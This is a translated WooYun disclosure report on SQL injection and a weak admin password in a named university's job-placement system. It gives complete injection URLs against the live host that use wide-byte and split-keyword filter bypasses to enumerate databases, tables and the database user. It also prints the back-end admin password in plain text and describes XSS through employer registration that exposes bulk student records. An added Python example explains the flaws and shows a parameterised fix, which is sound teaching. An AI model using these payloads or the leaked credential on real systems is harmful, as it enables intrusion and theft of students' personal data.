Vulnerability summary

Defect ID: wooyun-2013-044286

Title: SQL injection and a weak back-end password in a university job-placement information system allow large-scale leakage of student information

Vendor: Zhengzhou University of Light Industry (郑州轻工业学院)

Author: RedFree

Submitted: 2013-11-28 14:43

Fix deadline: 2014-01-12 14:43

Published: 2014-01-12 14:43

Type: SQL injection

Severity: Low

Self-assessed Rank: 5

Status: vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2013-11-28: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-01-12: The vendor has actively ignored the report; details disclosed to the public

Summary:

The SQL injection filter in a university's job-placement system can be bypassed, exposing the contents of the database; the administrative back end can then be used to export student records in bulk.

Details:

The problem is in the archive-destination lookup page. Requesting:
http://job.zzuli.edu.cn/index_archives.php?search_keyword=1109059&search_type=1&actiontype=0
returns the archive destination of the student with ID 1109059.

[Screenshot: 1.jpg]

The student-ID input escapes and filters keywords such as ', select, union, and, or, from. However, a wide (multi-byte) character can swallow the escaping backslash, and the keyword filter strips each keyword only once, so writing "s select elect" or "u union nion" reassembles the keyword after filtering.

1. Use "order by N" to determine the column count:

[Screenshot: 2.jpg]

[Screenshot: 3.jpg]

The column count is 118.

2. List all databases:

http://job.zzuli.edu.cn/index_archives.php?search_keyword=1109059%C7' u union nion s select elect 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,1,2,3,4,5,6,7,8,9,10,11,12,13,14,SCHEMA_NAME,16,17,18 f from rom information_schema.SCHEMATA %23&search_type=1&actiontype=0


All databases:

[Screenshot: 4.jpg]

information_schema
job_zzuli

3. List all tables in job_zzuli:

http://job.zzuli.edu.cn/index_archives.php?search_keyword=1109059%D5' u union nion s select elect 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,1,2,3,4,5,6,7,8,9,10,11,12,13,14,table_name,table_schema,17,18 f from rom information_schema.tables %23&search_type=1&actiontype=0


Result:
admin_item
admin_itemfixplug
admin_itemplug
admin_logs
admin_menu
admin_navigation
admin_setting
admin_stat
admin_usermenu
admin_voting_input_results2
admin_voting_option
admin_voting_option2
admin_voting_page
admin_voting_title
admin_voting_title2
bulletin_files
bulletin_images
bulletin_zhaopin
bulletin_zhaopinhui
code_byqxdm
code_dwjbdm
code_dwjjlxdm
code_dwxzdm
code_gzgllbdm
code_hyzkdm
code_jclbdm
code_jhxzdm
code_jsjspdm
code_jylsfsdm
code_mz
code_pyfsdm
code_tdfsdm
code_tdxzdm
code_wyjbdm
code_wyyz
…
…

4. Query the database user:

http://job.zzuli.edu.cn/index_archives.php?search_keyword=1109059%C7' u union nion s select elect 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,1,2,3,4,5,6,7,8,9,10,11,12,13,14,user(),16,17,18 %23&search_type=1&actiontype=0


job_zzuli@localhost

5. Query the database path:
/var/lib/mysql/
…

Back-end weak password: admin 63556326

Posing as an employer and inserting XSS code while filling in the registration form also reaches the back end (administrators review employer entries periodically).

[Screenshot: 7.jpg]

Large numbers of student records:

[Screenshot: 5.jpg]

[Screenshot: 6.jpg]

…

Proof of vulnerability:

[Screenshot: 4.jpg]

[Screenshot: 5.jpg]

[Screenshot: 6.jpg]

Suggested fix:

1. The filtering is far too simplistic; of course it can be bypassed…
2. Change the back-end password.
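The two weaknesses the report relies on (single-pass keyword stripping and charset-unaware escaping that a GBK lead byte can defeat) and the fix the author recommends can be shown side by side. The following Python is an added example written for this page, not code from the report or from the affected system; the filter model, the GBK lead byte 0xBF, the table name "archives" and the sample rows are all constructed assumptions, and the real filter code was never published.

```python
import re
import sqlite3

# Model of the kind of input filter the report describes: each blacklisted
# keyword is stripped in a single pass, then quotes are escaped. This is an
# assumption about the site's filter; its real code was not published.
BLACKLIST = ("select", "union", "from", "and", "or")


def naive_sanitize(keyword: str) -> str:
    """Single-pass keyword stripping followed by addslashes-style escaping."""
    for word in BLACKLIST:
        # The report's payload shape ("s select elect") implies the filter
        # matched the keyword together with its surrounding spaces (inferred).
        keyword = re.sub(" %s " % word, "", keyword, flags=re.IGNORECASE)
    return keyword.replace("\\", "\\\\").replace("'", "\\'")


def addslashes_bytes(data: bytes) -> bytes:
    """Byte-oriented escaping, as a charset-unaware escaper performs it."""
    return data.replace(b"\\", b"\\\\").replace(b"'", b"\\'")


def quote_survives_gbk(raw: bytes) -> bool:
    """True if a GBK decode of the escaped bytes still contains a bare quote.

    A lead byte in 0x81-0xFE followed by the inserted backslash (0x5C) forms a
    valid two-byte GBK character, so the backslash is absorbed into that
    character and the quote after it is no longer escaped. The lead byte 0xBF
    used in the test is a constructed example; the report used other values.
    """
    text = addslashes_bytes(raw).decode("gbk", errors="replace")
    return re.search(r"(?<!\\)'", text) is not None


def legacy_query_text(keyword: str) -> str:
    """The vulnerable pattern: filter, then splice the string into the SQL."""
    return "SELECT * FROM archives WHERE student_id = '%s'" % naive_sanitize(keyword)


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the archive table, filled with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE archives (student_id TEXT, destination TEXT)")
    conn.executemany(
        "INSERT INTO archives VALUES (?, ?)",
        [("1109059", "Constructed Employer A"), ("1109060", "Constructed Employer B")],
    )
    return conn


def safe_lookup(conn: sqlite3.Connection, keyword: str) -> list:
    """Hardened form: the keyword is bound as a parameter, never spliced into SQL.

    Whatever the input contains, it is compared as a value, so there is no
    keyword list to maintain and no escaping whose correctness depends on the
    connection charset.
    """
    return conn.execute(
        "SELECT student_id, destination FROM archives WHERE student_id = ?",
        (keyword,),
    ).fetchall()


if __name__ == "__main__":
    # Stripping once lets split keywords reassemble.
    print(naive_sanitize("u union nion s select elect 1"))
    # Byte-level escaping before a GBK decode leaves the quote unescaped.
    print(quote_survives_gbk(b"\xbf'"), quote_survives_gbk(b"abc'"))
    conn = make_db()
    print(safe_lookup(conn, "1109059"))
    print(safe_lookup(conn, "1109059' OR '1'='1"))
```

Two practical points follow from this. A keyword blacklist is not a sanitizer: stripping has to be applied until the input stops changing to be even approximately sound, and even then it is the wrong tool; bound parameters remove the problem entirely. If the application must keep a MySQL connection in GBK, the escaping routine has to know the connection charset (in PHP that means setting it through the driver, e.g. mysqli_set_charset, rather than with a bare SET NAMES), or the byte-level backslash insertion shown above can be undone by the decoder. The weak administrative password is a separate control and needs a password policy, not just a one-off change.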

Copyright notice: please credit the source when reposting: RedFree@WooYun

Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively declined to respond